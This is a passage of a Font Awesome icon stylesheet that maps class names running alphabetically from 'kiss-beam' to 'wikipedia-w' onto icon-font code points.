.fa-kiss-beam:before {
  content: "\f597"; }

.fa-kiss-wink-heart:before {
  content: "\f598"; }

.fa-kiwi-bird:before {
  content: "\f535"; }

.fa-korvue:before {
  content: "\f42f"; }

.fa-landmark:before {
  content: "\f66f"; }

.fa-language:before {
  content: "\f1ab"; }

.fa-laptop:before {
  content: "\f109"; }

.fa-laptop-code:before {
  content: "\f5fc"; }

.fa-laptop-medical:before {
  content: "\f812"; }

.fa-laravel:before {
  content: "\f3bd"; }

.fa-lastfm:before {
  content: "\f202"; }

.fa-lastfm-square:before {
  content: "\f203"; }

.fa-laugh:before {
  content: "\f599"; }

.fa-laugh-beam:before {
  content: "\f59a"; }

.fa-laugh-squint:before {
  content: "\f59b"; }

.fa-laugh-wink:before {
  content: "\f59c"; }

.fa-layer-group:before {
  content: "\f5fd"; }

.fa-leaf:before {
  content: "\f06c"; }

.fa-leanpub:before {
  content: "\f212"; }

.fa-lemon:before {
  content: "\f094"; }

.fa-less:before {
  content: "\f41d"; }

.fa-less-than:before {
  content: "\f536"; }

.fa-less-than-equal:before {
  content: "\f537"; }

.fa-level-down-alt:before {
  content: "\f3be"; }

.fa-level-up-alt:before {
  content: "\f3bf"; }

.fa-life-ring:before {
  content: "\f1cd"; }

.fa-lightbulb:before {
  content: "\f0eb"; }

.fa-line:before {
  content: "\f3c0"; }

.fa-link:before {
  content: "\f0c1"; }

.fa-linkedin:before {
  content: "\f08c"; }

.fa-linkedin-in:before {
  content: "\f0e1"; }

.fa-linode:before {
  content: "\f2b8"; }

.fa-linux:before {
  content: "\f17c"; }

.fa-lira-sign:before {
  content: "\f195"; }

.fa-list:before {
  content: "\f03a"; }

.fa-list-alt:before {
  content: "\f022"; }

.fa-list-ol:before {
  content: "\f0cb"; }

.fa-list-ul:before {
  content: "\f0ca"; }

.fa-location-arrow:before {
  content: "\f124"; }

.fa-lock:before {
  content: "\f023"; }

.fa-lock-open:before {
  content: "\f3c1"; }

.fa-long-arrow-alt-down:before {
  content: "\f309"; }

.fa-long-arrow-alt-left:before {
  content: "\f30a"; }

.fa-long-arrow-alt-right:before {
  content: "\f30b"; }

.fa-long-arrow-alt-up:before {
  content: "\f30c"; }

.fa-low-vision:before {
  content: "\f2a8"; }

.fa-luggage-cart:before {
  content: "\f59d"; }

.fa-lyft:before {
  content: "\f3c3"; }

.fa-magento:before {
  content: "\f3c4"; }

.fa-magic:before {
  content: "\f0d0"; }

.fa-magnet:before {
  content: "\f076"; }

.fa-mail-bulk:before {
  content: "\f674"; }

.fa-mailchimp:before {
  content: "\f59e"; }

.fa-male:before {
  content: "\f183"; }

.fa-mandalorian:before {
  content: "\f50f"; }

.fa-map:before {
  content: "\f279"; }

.fa-map-marked:before {
  content: "\f59f"; }

.fa-map-marked-alt:before {
  content: "\f5a0"; }

.fa-map-marker:before {
  content: "\f041"; }

.fa-map-marker-alt:before {
  content: "\f3c5"; }

.fa-map-pin:before {
  content: "\f276"; }

.fa-map-signs:before {
  content: "\f277"; }

.fa-markdown:before {
  content: "\f60f"; }

.fa-marker:before {
  content: "\f5a1"; }

.fa-mars:before {
  content: "\f222"; }

.fa-mars-double:before {
  content: "\f227"; }

.fa-mars-stroke:before {
  content: "\f229"; }

.fa-mars-stroke-h:before {
  content: "\f22b"; }

.fa-mars-stroke-v:before {
  content: "\f22a"; }

.fa-mask:before {
  content: "\f6fa"; }

.fa-mastodon:before {
  content: "\f4f6"; }

.fa-maxcdn:before {
  content: "\f136"; }

.fa-medal:before {
  content: "\f5a2"; }

.fa-medapps:before {
  content: "\f3c6"; }

.fa-medium:before {
  content: "\f23a"; }

.fa-medium-m:before {
  content: "\f3c7"; }

.fa-medkit:before {
  content: "\f0fa"; }

.fa-medrt:before {
  content: "\f3c8"; }

.fa-meetup:before {
  content: "\f2e0"; }

.fa-megaport:before {
  content: "\f5a3"; }

.fa-meh:before {
  content: "\f11a"; }

.fa-meh-blank:before {
  content: "\f5a4"; }

.fa-meh-rolling-eyes:before {
  content: "\f5a5"; }

.fa-memory:before {
  content: "\f538"; }

.fa-mendeley:before {
  content: "\f7b3"; }

.fa-menorah:before {
  content: "\f676"; }

.fa-mercury:before {
  content: "\f223"; }

.fa-meteor:before {
  content: "\f753"; }

.fa-microchip:before {
  content: "\f2db"; }

.fa-microphone:before {
  content: "\f130"; }

.fa-microphone-alt:before {
  content: "\f3c9"; }

.fa-microphone-alt-slash:before {
  content: "\f539"; }

.fa-microphone-slash:before {
  content: "\f131"; }

.fa-microscope:before {
  content: "\f610"; }

.fa-microsoft:before {
  content: "\f3ca"; }

.fa-minus:before {
  content: "\f068"; }

.fa-minus-circle:before {
  content: "\f056"; }

.fa-minus-square:before {
  content: "\f146"; }

.fa-mitten:before {
  content: "\f7b5"; }

.fa-mix:before {
  content: "\f3cb"; }

.fa-mixcloud:before {
  content: "\f289"; }

.fa-mizuni:before {
  content: "\f3cc"; }

.fa-mobile:before {
  content: "\f10b"; }

.fa-mobile-alt:before {
  content: "\f3cd"; }

.fa-modx:before {
  content: "\f285"; }

.fa-monero:before {
  content: "\f3d0"; }

.fa-money-bill:before {
  content: "\f0d6"; }

.fa-money-bill-alt:before {
  content: "\f3d1"; }

.fa-money-bill-wave:before {
  content: "\f53a"; }

.fa-money-bill-wave-alt:before {
  content: "\f53b"; }

.fa-money-check:before {
  content: "\f53c"; }

.fa-money-check-alt:before {
  content: "\f53d"; }

.fa-monument:before {
  content: "\f5a6"; }

.fa-moon:before {
  content: "\f186"; }

.fa-mortar-pestle:before {
  content: "\f5a7"; }

.fa-mosque:before {
  content: "\f678"; }

.fa-motorcycle:before {
  content: "\f21c"; }

.fa-mountain:before {
  content: "\f6fc"; }

.fa-mouse-pointer:before {
  content: "\f245"; }

.fa-mug-hot:before {
  content: "\f7b6"; }

.fa-music:before {
  content: "\f001"; }

.fa-napster:before {
  content: "\f3d2"; }

.fa-neos:before {
  content: "\f612"; }

.fa-network-wired:before {
  content: "\f6ff"; }

.fa-neuter:before {
  content: "\f22c"; }

.fa-newspaper:before {
  content: "\f1ea"; }

.fa-nimblr:before {
  content: "\f5a8"; }

.fa-nintendo-switch:before {
  content: "\f418"; }

.fa-node:before {
  content: "\f419"; }

.fa-node-js:before {
  content: "\f3d3"; }

.fa-not-equal:before {
  content: "\f53e"; }

.fa-notes-medical:before {
  content: "\f481"; }

.fa-npm:before {
  content: "\f3d4"; }

.fa-ns8:before {
  content: "\f3d5"; }

.fa-nutritionix:before {
  content: "\f3d6"; }

.fa-object-group:before {
  content: "\f247"; }

.fa-object-ungroup:before {
  content: "\f248"; }

.fa-odnoklassniki:before {
  content: "\f263"; }

.fa-odnoklassniki-square:before {
  content: "\f264"; }

.fa-oil-can:before {
  content: "\f613"; }

.fa-old-republic:before {
  content: "\f510"; }

.fa-om:before {
  content: "\f679"; }

.fa-opencart:before {
  content: "\f23d"; }

.fa-openid:before {
  content: "\f19b"; }

.fa-opera:before {
  content: "\f26a"; }

.fa-optin-monster:before {
  content: "\f23c"; }

.fa-osi:before {
  content: "\f41a"; }

.fa-otter:before {
  content: "\f700"; }

.fa-outdent:before {
  content: "\f03b"; }

.fa-page4:before {
  content: "\f3d7"; }

.fa-pagelines:before {
  content: "\f18c"; }

.fa-pager:before {
  content: "\f815"; }

.fa-paint-brush:before {
  content: "\f1fc"; }

.fa-paint-roller:before {
  content: "\f5aa"; }

.fa-palette:before {
  content: "\f53f"; }

.fa-palfed:before {
  content: "\f3d8"; }

.fa-pallet:before {
  content: "\f482"; }

.fa-paper-plane:before {
  content: "\f1d8"; }

.fa-paperclip:before {
  content: "\f0c6"; }

.fa-parachute-box:before {
  content: "\f4cd"; }

.fa-paragraph:before {
  content: "\f1dd"; }

.fa-parking:before {
  content: "\f540"; }

.fa-passport:before {
  content: "\f5ab"; }

.fa-pastafarianism:before {
  content: "\f67b"; }

.fa-paste:before {
  content: "\f0ea"; }

.fa-patreon:before {
  content: "\f3d9"; }

.fa-pause:before {
  content: "\f04c"; }

.fa-pause-circle:before {
  content: "\f28b"; }

.fa-paw:before {
  content: "\f1b0"; }

.fa-paypal:before {
  content: "\f1ed"; }

.fa-peace:before {
  content: "\f67c"; }

.fa-pen:before {
  content: "\f304"; }

.fa-pen-alt:before {
  content: "\f305"; }

.fa-pen-fancy:before {
  content: "\f5ac"; }

.fa-pen-nib:before {
  content: "\f5ad"; }

.fa-pen-square:before {
  content: "\f14b"; }

.fa-pencil-alt:before {
  content: "\f303"; }

.fa-pencil-ruler:before {
  content: "\f5ae"; }

.fa-penny-arcade:before {
  content: "\f704"; }

.fa-people-carry:before {
  content: "\f4ce"; }

.fa-pepper-hot:before {
  content: "\f816"; }

.fa-percent:before {
  content: "\f295"; }

.fa-percentage:before {
  content: "\f541"; }

.fa-periscope:before {
  content: "\f3da"; }

.fa-person-booth:before {
  content: "\f756"; }

.fa-phabricator:before {
  content: "\f3db"; }

.fa-phoenix-framework:before {
  content: "\f3dc"; }

.fa-phoenix-squadron:before {
  content: "\f511"; }

.fa-phone:before {
  content: "\f095"; }

.fa-phone-slash:before {
  content: "\f3dd"; }

.fa-phone-square:before {
  content: "\f098"; }

.fa-phone-volume:before {
  content: "\f2a0"; }

.fa-php:before {
  content: "\f457"; }

.fa-pied-piper:before {
  content: "\f2ae"; }

.fa-pied-piper-alt:before {
  content: "\f1a8"; }

.fa-pied-piper-hat:before {
  content: "\f4e5"; }

.fa-pied-piper-pp:before {
  content: "\f1a7"; }

.fa-piggy-bank:before {
  content: "\f4d3"; }

.fa-pills:before {
  content: "\f484"; }

.fa-pinterest:before {
  content: "\f0d2"; }

.fa-pinterest-p:before {
  content: "\f231"; }

.fa-pinterest-square:before {
  content: "\f0d3"; }

.fa-pizza-slice:before {
  content: "\f818"; }

.fa-place-of-worship:before {
  content: "\f67f"; }

.fa-plane:before {
  content: "\f072"; }

.fa-plane-arrival:before {
  content: "\f5af"; }

.fa-plane-departure:before {
  content: "\f5b0"; }

.fa-play:before {
  content: "\f04b"; }

.fa-play-circle:before {
  content: "\f144"; }

.fa-playstation:before {
  content: "\f3df"; }

.fa-plug:before {
  content: "\f1e6"; }

.fa-plus:before {
  content: "\f067"; }

.fa-plus-circle:before {
  content: "\f055"; }

.fa-plus-square:before {
  content: "\f0fe"; }

.fa-podcast:before {
  content: "\f2ce"; }

.fa-poll:before {
  content: "\f681"; }

.fa-poll-h:before {
  content: "\f682"; }

.fa-poo:before {
  content: "\f2fe"; }

.fa-poo-storm:before {
  content: "\f75a"; }

.fa-poop:before {
  content: "\f619"; }

.fa-portrait:before {
  content: "\f3e0"; }

.fa-pound-sign:before {
  content: "\f154"; }

.fa-power-off:before {
  content: "\f011"; }

.fa-pray:before {
  content: "\f683"; }

.fa-praying-hands:before {
  content: "\f684"; }

.fa-prescription:before {
  content: "\f5b1"; }

.fa-prescription-bottle:before {
  content: "\f485"; }

.fa-prescription-bottle-alt:before {
  content: "\f486"; }

.fa-print:before {
  content: "\f02f"; }

.fa-procedures:before {
  content: "\f487"; }

.fa-product-hunt:before {
  content: "\f288"; }

.fa-project-diagram:before {
  content: "\f542"; }

.fa-pushed:before {
  content: "\f3e1"; }

.fa-puzzle-piece:before {
  content: "\f12e"; }

.fa-python:before {
  content: "\f3e2"; }

.fa-qq:before {
  content: "\f1d6"; }

.fa-qrcode:before {
  content: "\f029"; }

.fa-question:before {
  content: "\f128"; }

.fa-question-circle:before {
  content: "\f059"; }

.fa-quidditch:before {
  content: "\f458"; }

.fa-quinscape:before {
  content: "\f459"; }

.fa-quora:before {
  content: "\f2c4"; }

.fa-quote-left:before {
  content: "\f10d"; }

.fa-quote-right:before {
  content: "\f10e"; }

.fa-quran:before {
  content: "\f687"; }

.fa-r-project:before {
  content: "\f4f7"; }

.fa-radiation:before {
  content: "\f7b9"; }

.fa-radiation-alt:before {
  content: "\f7ba"; }

.fa-rainbow:before {
  content: "\f75b"; }

.fa-random:before {
  content: "\f074"; }

.fa-raspberry-pi:before {
  content: "\f7bb"; }

.fa-ravelry:before {
  content: "\f2d9"; }

.fa-react:before {
  content: "\f41b"; }

.fa-reacteurope:before {
  content: "\f75d"; }

.fa-readme:before {
  content: "\f4d5"; }

.fa-rebel:before {
  content: "\f1d0"; }

.fa-receipt:before {
  content: "\f543"; }

.fa-recycle:before {
  content: "\f1b8"; }

.fa-red-river:before {
  content: "\f3e3"; }

.fa-reddit:before {
  content: "\f1a1"; }

.fa-reddit-alien:before {
  content: "\f281"; }

.fa-reddit-square:before {
  content: "\f1a2"; }

.fa-redhat:before {
  content: "\f7bc"; }

.fa-redo:before {
  content: "\f01e"; }

.fa-redo-alt:before {
  content: "\f2f9"; }

.fa-registered:before {
  content: "\f25d"; }

.fa-renren:before {
  content: "\f18b"; }

.fa-reply:before {
  content: "\f3e5"; }

.fa-reply-all:before {
  content: "\f122"; }

.fa-replyd:before {
  content: "\f3e6"; }

.fa-republican:before {
  content: "\f75e"; }

.fa-researchgate:before {
  content: "\f4f8"; }

.fa-resolving:before {
  content: "\f3e7"; }

.fa-restroom:before {
  content: "\f7bd"; }

.fa-retweet:before {
  content: "\f079"; }

.fa-rev:before {
  content: "\f5b2"; }

.fa-ribbon:before {
  content: "\f4d6"; }

.fa-ring:before {
  content: "\f70b"; }

.fa-road:before {
  content: "\f018"; }

.fa-robot:before {
  content: "\f544"; }

.fa-rocket:before {
  content: "\f135"; }

.fa-rocketchat:before {
  content: "\f3e8"; }

.fa-rockrms:before {
  content: "\f3e9"; }

.fa-route:before {
  content: "\f4d7"; }

.fa-rss:before {
  content: "\f09e"; }

.fa-rss-square:before {
  content: "\f143"; }

.fa-ruble-sign:before {
  content: "\f158"; }

.fa-ruler:before {
  content: "\f545"; }

.fa-ruler-combined:before {
  content: "\f546"; }

.fa-ruler-horizontal:before {
  content: "\f547"; }

.fa-ruler-vertical:before {
  content: "\f548"; }

.fa-running:before {
  content: "\f70c"; }

.fa-rupee-sign:before {
  content: "\f156"; }

.fa-sad-cry:before {
  content: "\f5b3"; }

.fa-sad-tear:before {
  content: "\f5b4"; }

.fa-safari:before {
  content: "\f267"; }

.fa-sass:before {
  content: "\f41e"; }

.fa-satellite:before {
  content: "\f7bf"; }

.fa-satellite-dish:before {
  content: "\f7c0"; }

.fa-save:before {
  content: "\f0c7"; }

.fa-schlix:before {
  content: "\f3ea"; }

.fa-school:before {
  content: "\f549"; }

.fa-screwdriver:before {
  content: "\f54a"; }

.fa-scribd:before {
  content: "\f28a"; }

.fa-scroll:before {
  content: "\f70e"; }

.fa-sd-card:before {
  content: "\f7c2"; }

.fa-search:before {
  content: "\f002"; }

.fa-search-dollar:before {
  content: "\f688"; }

.fa-search-location:before {
  content: "\f689"; }

.fa-search-minus:before {
  content: "\f010"; }

.fa-search-plus:before {
  content: "\f00e"; }

.fa-searchengin:before {
  content: "\f3eb"; }

.fa-seedling:before {
  content: "\f4d8"; }

.fa-sellcast:before {
  content: "\f2da"; }

.fa-sellsy:before {
  content: "\f213"; }

.fa-server:before {
  content: "\f233"; }

.fa-servicestack:before {
  content: "\f3ec"; }

.fa-shapes:before {
  content: "\f61f"; }

.fa-share:before {
  content: "\f064"; }

.fa-share-alt:before {
  content: "\f1e0"; }

.fa-share-alt-square:before {
  content: "\f1e1"; }

.fa-share-square:before {
  content: "\f14d"; }

.fa-shekel-sign:before {
  content: "\f20b"; }

.fa-shield-alt:before {
  content: "\f3ed"; }

.fa-ship:before {
  content: "\f21a"; }

.fa-shipping-fast:before {
  content: "\f48b"; }

.fa-shirtsinbulk:before {
  content: "\f214"; }

.fa-shoe-prints:before {
  content: "\f54b"; }

.fa-shopping-bag:before {
  content: "\f290"; }

.fa-shopping-basket:before {
  content: "\f291"; }

.fa-shopping-cart:before {
  content: "\f07a"; }

.fa-shopware:before {
  content: "\f5b5"; }

.fa-shower:before {
  content: "\f2cc"; }

.fa-shuttle-van:before {
  content: "\f5b6"; }

.fa-sign:before {
  content: "\f4d9"; }

.fa-sign-in-alt:before {
  content: "\f2f6"; }

.fa-sign-language:before {
  content: "\f2a7"; }

.fa-sign-out-alt:before {
  content: "\f2f5"; }

.fa-signal:before {
  content: "\f012"; }

.fa-signature:before {
  content: "\f5b7"; }

.fa-sim-card:before {
  content: "\f7c4"; }

.fa-simplybuilt:before {
  content: "\f215"; }

.fa-sistrix:before {
  content: "\f3ee"; }

.fa-sitemap:before {
  content: "\f0e8"; }

.fa-sith:before {
  content: "\f512"; }

.fa-skating:before {
  content: "\f7c5"; }

.fa-sketch:before {
  content: "\f7c6"; }

.fa-skiing:before {
  content: "\f7c9"; }

.fa-skiing-nordic:before {
  content: "\f7ca"; }

.fa-skull:before {
  content: "\f54c"; }

.fa-skull-crossbones:before {
  content: "\f714"; }

.fa-skyatlas:before {
  content: "\f216"; }

.fa-skype:before {
  content: "\f17e"; }

.fa-slack:before {
  content: "\f198"; }

.fa-slack-hash:before {
  content: "\f3ef"; }

.fa-slash:before {
  content: "\f715"; }

.fa-sleigh:before {
  content: "\f7cc"; }

.fa-sliders-h:before {
  content: "\f1de"; }

.fa-slideshare:before {
  content: "\f1e7"; }

.fa-smile:before {
  content: "\f118"; }

.fa-smile-beam:before {
  content: "\f5b8"; }

.fa-smile-wink:before {
  content: "\f4da"; }

.fa-smog:before {
  content: "\f75f"; }

.fa-smoking:before {
  content: "\f48d"; }

.fa-smoking-ban:before {
  content: "\f54d"; }

.fa-sms:before {
  content: "\f7cd"; }

.fa-snapchat:before {
  content: "\f2ab"; }

.fa-snapchat-ghost:before {
  content: "\f2ac"; }

.fa-snapchat-square:before {
  content: "\f2ad"; }

.fa-snowboarding:before {
  content: "\f7ce"; }

.fa-snowflake:before {
  content: "\f2dc"; }

.fa-snowman:before {
  content: "\f7d0"; }

.fa-snowplow:before {
  content: "\f7d2"; }

.fa-socks:before {
  content: "\f696"; }

.fa-solar-panel:before {
  content: "\f5ba"; }

.fa-sort:before {
  content: "\f0dc"; }

.fa-sort-alpha-down:before {
  content: "\f15d"; }

.fa-sort-alpha-up:before {
  content: "\f15e"; }

.fa-sort-amount-down:before {
  content: "\f160"; }

.fa-sort-amount-up:before {
  content: "\f161"; }

.fa-sort-down:before {
  content: "\f0dd"; }

.fa-sort-numeric-down:before {
  content: "\f162"; }

.fa-sort-numeric-up:before {
  content: "\f163"; }

.fa-sort-up:before {
  content: "\f0de"; }

.fa-soundcloud:before {
  content: "\f1be"; }

.fa-sourcetree:before {
  content: "\f7d3"; }

.fa-spa:before {
  content: "\f5bb"; }

.fa-space-shuttle:before {
  content: "\f197"; }

.fa-speakap:before {
  content: "\f3f3"; }

.fa-spider:before {
  content: "\f717"; }

.fa-spinner:before {
  content: "\f110"; }

.fa-splotch:before {
  content: "\f5bc"; }

.fa-spotify:before {
  content: "\f1bc"; }

.fa-spray-can:before {
  content: "\f5bd"; }

.fa-square:before {
  content: "\f0c8"; }

.fa-square-full:before {
  content: "\f45c"; }

.fa-square-root-alt:before {
  content: "\f698"; }

.fa-squarespace:before {
  content: "\f5be"; }

.fa-stack-exchange:before {
  content: "\f18d"; }

.fa-stack-overflow:before {
  content: "\f16c"; }

.fa-stamp:before {
  content: "\f5bf"; }

.fa-star:before {
  content: "\f005"; }

.fa-star-and-crescent:before {
  content: "\f699"; }

.fa-star-half:before {
  content: "\f089"; }

.fa-star-half-alt:before {
  content: "\f5c0"; }

.fa-star-of-david:before {
  content: "\f69a"; }

.fa-star-of-life:before {
  content: "\f621"; }

.fa-staylinked:before {
  content: "\f3f5"; }

.fa-steam:before {
  content: "\f1b6"; }

.fa-steam-square:before {
  content: "\f1b7"; }

.fa-steam-symbol:before {
  content: "\f3f6"; }

.fa-step-backward:before {
  content: "\f048"; }

.fa-step-forward:before {
  content: "\f051"; }

.fa-stethoscope:before {
  content: "\f0f1"; }

.fa-sticker-mule:before {
  content: "\f3f7"; }

.fa-sticky-note:before {
  content: "\f249"; }

.fa-stop:before {
  content: "\f04d"; }

.fa-stop-circle:before {
  content: "\f28d"; }

.fa-stopwatch:before {
  content: "\f2f2"; }

.fa-store:before {
  content: "\f54e"; }

.fa-store-alt:before {
  content: "\f54f"; }

.fa-strava:before {
  content: "\f428"; }

.fa-stream:before {
  content: "\f550"; }

.fa-street-view:before {
  content: "\f21d"; }

.fa-strikethrough:before {
  content: "\f0cc"; }

.fa-stripe:before {
  content: "\f429"; }

.fa-stripe-s:before {
  content: "\f42a"; }

.fa-stroopwafel:before {
  content: "\f551"; }

.fa-studiovinari:before {
  content: "\f3f8"; }

.fa-stumbleupon:before {
  content: "\f1a4"; }

.fa-stumbleupon-circle:before {
  content: "\f1a3"; }

.fa-subscript:before {
  content: "\f12c"; }

.fa-subway:before {
  content: "\f239"; }

.fa-suitcase:before {
  content: "\f0f2"; }

.fa-suitcase-rolling:before {
  content: "\f5c1"; }

.fa-sun:before {
  content: "\f185"; }

.fa-superpowers:before {
  content: "\f2dd"; }

.fa-superscript:before {
  content: "\f12b"; }

.fa-supple:before {
  content: "\f3f9"; }

.fa-surprise:before {
  content: "\f5c2"; }

.fa-suse:before {
  content: "\f7d6"; }

.fa-swatchbook:before {
  content: "\f5c3"; }

.fa-swimmer:before {
  content: "\f5c4"; }

.fa-swimming-pool:before {
  content: "\f5c5"; }

.fa-synagogue:before {
  content: "\f69b"; }

.fa-sync:before {
  content: "\f021"; }

.fa-sync-alt:before {
  content: "\f2f1"; }

.fa-syringe:before {
  content: "\f48e"; }

.fa-table:before {
  content: "\f0ce"; }

.fa-table-tennis:before {
  content: "\f45d"; }

.fa-tablet:before {
  content: "\f10a"; }

.fa-tablet-alt:before {
  content: "\f3fa"; }

.fa-tablets:before {
  content: "\f490"; }

.fa-tachometer-alt:before {
  content: "\f3fd"; }

.fa-tag:before {
  content: "\f02b"; }

.fa-tags:before {
  content: "\f02c"; }

.fa-tape:before {
  content: "\f4db"; }

.fa-tasks:before {
  content: "\f0ae"; }

.fa-taxi:before {
  content: "\f1ba"; }

.fa-teamspeak:before {
  content: "\f4f9"; }

.fa-teeth:before {
  content: "\f62e"; }

.fa-teeth-open:before {
  content: "\f62f"; }

.fa-telegram:before {
  content: "\f2c6"; }

.fa-telegram-plane:before {
  content: "\f3fe"; }

.fa-temperature-high:before {
  content: "\f769"; }

.fa-temperature-low:before {
  content: "\f76b"; }

.fa-tencent-weibo:before {
  content: "\f1d5"; }

.fa-tenge:before {
  content: "\f7d7"; }

.fa-terminal:before {
  content: "\f120"; }

.fa-text-height:before {
  content: "\f034"; }

.fa-text-width:before {
  content: "\f035"; }

.fa-th:before {
  content: "\f00a"; }

.fa-th-large:before {
  content: "\f009"; }

.fa-th-list:before {
  content: "\f00b"; }

.fa-the-red-yeti:before {
  content: "\f69d"; }

.fa-theater-masks:before {
  content: "\f630"; }

.fa-themeco:before {
  content: "\f5c6"; }

.fa-themeisle:before {
  content: "\f2b2"; }

.fa-thermometer:before {
  content: "\f491"; }

.fa-thermometer-empty:before {
  content: "\f2cb"; }

.fa-thermometer-full:before {
  content: "\f2c7"; }

.fa-thermometer-half:before {
  content: "\f2c9"; }

.fa-thermometer-quarter:before {
  content: "\f2ca"; }

.fa-thermometer-three-quarters:before {
  content: "\f2c8"; }

.fa-think-peaks:before {
  content: "\f731"; }

.fa-thumbs-down:before {
  content: "\f165"; }

.fa-thumbs-up:before {
  content: "\f164"; }

.fa-thumbtack:before {
  content: "\f08d"; }

.fa-ticket-alt:before {
  content: "\f3ff"; }

.fa-times:before {
  content: "\f00d"; }

.fa-times-circle:before {
  content: "\f057"; }

.fa-tint:before {
  content: "\f043"; }

.fa-tint-slash:before {
  content: "\f5c7"; }

.fa-tired:before {
  content: "\f5c8"; }

.fa-toggle-off:before {
  content: "\f204"; }

.fa-toggle-on:before {
  content: "\f205"; }

.fa-toilet:before {
  content: "\f7d8"; }

.fa-toilet-paper:before {
  content: "\f71e"; }

.fa-toolbox:before {
  content: "\f552"; }

.fa-tools:before {
  content: "\f7d9"; }

.fa-tooth:before {
  content: "\f5c9"; }

.fa-torah:before {
  content: "\f6a0"; }

.fa-torii-gate:before {
  content: "\f6a1"; }

.fa-tractor:before {
  content: "\f722"; }

.fa-trade-federation:before {
  content: "\f513"; }

.fa-trademark:before {
  content: "\f25c"; }

.fa-traffic-light:before {
  content: "\f637"; }

.fa-train:before {
  content: "\f238"; }

.fa-tram:before {
  content: "\f7da"; }

.fa-transgender:before {
  content: "\f224"; }

.fa-transgender-alt:before {
  content: "\f225"; }

.fa-trash:before {
  content: "\f1f8"; }

.fa-trash-alt:before {
  content: "\f2ed"; }

.fa-trash-restore:before {
  content: "\f829"; }

.fa-trash-restore-alt:before {
  content: "\f82a"; }

.fa-tree:before {
  content: "\f1bb"; }

.fa-trello:before {
  content: "\f181"; }

.fa-tripadvisor:before {
  content: "\f262"; }

.fa-trophy:before {
  content: "\f091"; }

.fa-truck:before {
  content: "\f0d1"; }

.fa-truck-loading:before {
  content: "\f4de"; }

.fa-truck-monster:before {
  content: "\f63b"; }

.fa-truck-moving:before {
  content: "\f4df"; }

.fa-truck-pickup:before {
  content: "\f63c"; }

.fa-tshirt:before {
  content: "\f553"; }

.fa-tty:before {
  content: "\f1e4"; }

.fa-tumblr:before {
  content: "\f173"; }

.fa-tumblr-square:before {
  content: "\f174"; }

.fa-tv:before {
  content: "\f26c"; }

.fa-twitch:before {
  content: "\f1e8"; }

.fa-twitter:before {
  content: "\f099"; }

.fa-twitter-square:before {
  content: "\f081"; }

.fa-typo3:before {
  content: "\f42b"; }

.fa-uber:before {
  content: "\f402"; }

.fa-ubuntu:before {
  content: "\f7df"; }

.fa-uikit:before {
  content: "\f403"; }

.fa-umbrella:before {
  content: "\f0e9"; }

.fa-umbrella-beach:before {
  content: "\f5ca"; }

.fa-underline:before {
  content: "\f0cd"; }

.fa-undo:before {
  content: "\f0e2"; }

.fa-undo-alt:before {
  content: "\f2ea"; }

.fa-uniregistry:before {
  content: "\f404"; }

.fa-universal-access:before {
  content: "\f29a"; }

.fa-university:before {
  content: "\f19c"; }

.fa-unlink:before {
  content: "\f127"; }

.fa-unlock:before {
  content: "\f09c"; }

.fa-unlock-alt:before {
  content: "\f13e"; }

.fa-untappd:before {
  content: "\f405"; }

.fa-upload:before {
  content: "\f093"; }

.fa-ups:before {
  content: "\f7e0"; }

.fa-usb:before {
  content: "\f287"; }

.fa-user:before {
  content: "\f007"; }

.fa-user-alt:before {
  content: "\f406"; }

.fa-user-alt-slash:before {
  content: "\f4fa"; }

.fa-user-astronaut:before {
  content: "\f4fb"; }

.fa-user-check:before {
  content: "\f4fc"; }

.fa-user-circle:before {
  content: "\f2bd"; }

.fa-user-clock:before {
  content: "\f4fd"; }

.fa-user-cog:before {
  content: "\f4fe"; }

.fa-user-edit:before {
  content: "\f4ff"; }

.fa-user-friends:before {
  content: "\f500"; }

.fa-user-graduate:before {
  content: "\f501"; }

.fa-user-injured:before {
  content: "\f728"; }

.fa-user-lock:before {
  content: "\f502"; }

.fa-user-md:before {
  content: "\f0f0"; }

.fa-user-minus:before {
  content: "\f503"; }

.fa-user-ninja:before {
  content: "\f504"; }

.fa-user-nurse:before {
  content: "\f82f"; }

.fa-user-plus:before {
  content: "\f234"; }

.fa-user-secret:before {
  content: "\f21b"; }

.fa-user-shield:before {
  content: "\f505"; }

.fa-user-slash:before {
  content: "\f506"; }

.fa-user-tag:before {
  content: "\f507"; }

.fa-user-tie:before {
  content: "\f508"; }

.fa-user-times:before {
  content: "\f235"; }

.fa-users:before {
  content: "\f0c0"; }

.fa-users-cog:before {
  content: "\f509"; }

.fa-usps:before {
  content: "\f7e1"; }

.fa-ussunnah:before {
  content: "\f407"; }

.fa-utensil-spoon:before {
  content: "\f2e5"; }

.fa-utensils:before {
  content: "\f2e7"; }

.fa-vaadin:before {
  content: "\f408"; }

.fa-vector-square:before {
  content: "\f5cb"; }

.fa-venus:before {
  content: "\f221"; }

.fa-venus-double:before {
  content: "\f226"; }

.fa-venus-mars:before {
  content: "\f228"; }

.fa-viacoin:before {
  content: "\f237"; }

.fa-viadeo:before {
  content: "\f2a9"; }

.fa-viadeo-square:before {
  content: "\f2aa"; }

.fa-vial:before {
  content: "\f492"; }

.fa-vials:before {
  content: "\f493"; }

.fa-viber:before {
  content: "\f409"; }

.fa-video:before {
  content: "\f03d"; }

.fa-video-slash:before {
  content: "\f4e2"; }

.fa-vihara:before {
  content: "\f6a7"; }

.fa-vimeo:before {
  content: "\f40a"; }

.fa-vimeo-square:before {
  content: "\f194"; }

.fa-vimeo-v:before {
  content: "\f27d"; }

.fa-vine:before {
  content: "\f1ca"; }

.fa-vk:before {
  content: "\f189"; }

.fa-vnv:before {
  content: "\f40b"; }

.fa-volleyball-ball:before {
  content: "\f45f"; }

.fa-volume-down:before {
  content: "\f027"; }

.fa-volume-mute:before {
  content: "\f6a9"; }

.fa-volume-off:before {
  content: "\f026"; }

.fa-volume-up:before {
  content: "\f028"; }

.fa-vote-yea:before {
  content: "\f772"; }

.fa-vr-cardboard:before {
  content: "\f729"; }

.fa-vuejs:before {
  content: "\f41f"; }

.fa-walking:before {
  content: "\f554"; }

.fa-wallet:before {
  content: "\f555"; }

.fa-warehouse:before {
  content: "\f494"; }

.fa-water:before {
  content: "\f773"; }

.fa-weebly:before {
  content: "\f5cc"; }

.fa-weibo:before {
  content: "\f18a"; }

.fa-weight:before {
  content: "\f496"; }

.fa-weight-hanging:before {
  content: "\f5cd"; }

.fa-weixin:before {
  content: "\f1d7"; }

.fa-whatsapp:before {
  content: "\f232"; }

.fa-whatsapp-square:before {
  content: "\f40c"; }

.fa-wheelchair:before {
  content: "\f193"; }

.fa-whmcs:before {
  content: "\f40d"; }

.fa-wifi:before {
  content: "\f1eb"; }

.fa-wikipedia-w:before {
  content: "\f266"; }

